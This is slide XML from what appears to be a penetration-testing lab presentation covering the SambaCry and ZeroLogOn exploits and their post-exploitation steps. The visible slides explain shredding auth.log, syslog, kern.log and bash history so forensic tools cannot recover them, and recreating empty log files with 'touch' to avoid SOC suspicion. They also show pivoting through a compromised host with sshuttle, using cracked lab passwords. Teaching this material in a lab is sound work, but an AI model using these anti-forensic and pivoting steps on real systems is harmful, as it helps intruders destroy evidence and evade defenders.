              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>-v : verbose info on progress</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>-f : force completion</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>-z : overwrite any existing data with zeroes (cannot discover using forensic tools)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>-u : truncate and remove the file</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="654" name="Google Shape;654;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="951975"/>
            <a:ext cx="4571757" cy="40391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73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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Shredding Logs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="660" name="Google Shape;660;p73"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="951975"/>
            <a:ext cx="6686550" cy="2305050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="661" name="Google Shape;661;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="210475" y="3641200"/>
            <a:ext cx="826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s">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>To verify that they have been removed successfully, we can do a listing.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Ligh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74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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Shredding Logs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="667" name="Google Shape;667;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266525" y="870300"/>
            <a:ext cx="7863900" cy="130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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Thereafter we can name empty files after the original filenames to avoid suspicion from the SOC or network team (at least for the time being) that might be looking into the log</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ touch auth.log syslog kern.log</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="668" name="Google Shape;668;p74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="526875" y="2096275"/>
            <a:ext cx="6962775" cy="28956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75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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Shredding Logs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="674" name="Google Shape;674;p75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266525" y="1436588"/>
            <a:ext cx="4273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s">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>One last important file we have to delete is the bash history. We will follow a similar methodology as mentioned previously.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="675" name="Google Shape;675;p75"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="703388" y="2816375"/>
            <a:ext cx="3399775" cy="994275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="676" name="Google Shape;676;p75"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4515800" y="1010825"/>
            <a:ext cx="4367901" cy="3919026"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="677" name="Google Shape;677;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="3856256" y="2904784"/>
            <a:ext cx="659400" cy="659700"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF6B6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76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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Pivoting</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="683" name="Google Shape;683;p76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="951975"/>
            <a:ext cx="4445824" cy="4039125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="684" name="Google Shape;684;p76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5310900" y="1174075"/>
            <a:ext cx="3204900" cy="238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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>The next task to carry out on the machine is carry out reconnaissance of any other networks that the compromised machined maybe connected to (in this case eth1)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>We can first do an ifconfig to get an idea of the interfaces available to be exploited.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="460125"/>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Exploits and Post-Exploitation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Google Shape;278;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410350" y="1421638"/>
            <a:ext cx="8520600" cy="29604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b="1" lang="es" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Exploit 1: SambaCry</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Post Exploit 1: Password Cracking</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Post Exploit 2: Clearing Tracks via Log Deletion</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Post Exploit 3: Pivoting into Windows Server</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Exploit 2: ZeroLogOn</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Post Exploit 1: Disabling Windows Firewall</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Post Exploit 2: Denying Access to Important Files</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>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77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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Pivoting</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="690" name="Google Shape;690;p77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5685375" y="1119000"/>
            <a:ext cx="3204900" cy="306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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>We can then use sshuttle to route traffic through the compromised machine</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>We will need to supply kali’s password and the smbvictim’s password.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In this case the password for local sudo will be “kali” and smbvictim will be “smbvictim” as cracked previously using john the ripper.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="691" name="Google Shape;691;p77"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1271375"/>
            <a:ext cx="5295900" cy="12573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78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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Pivoting</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
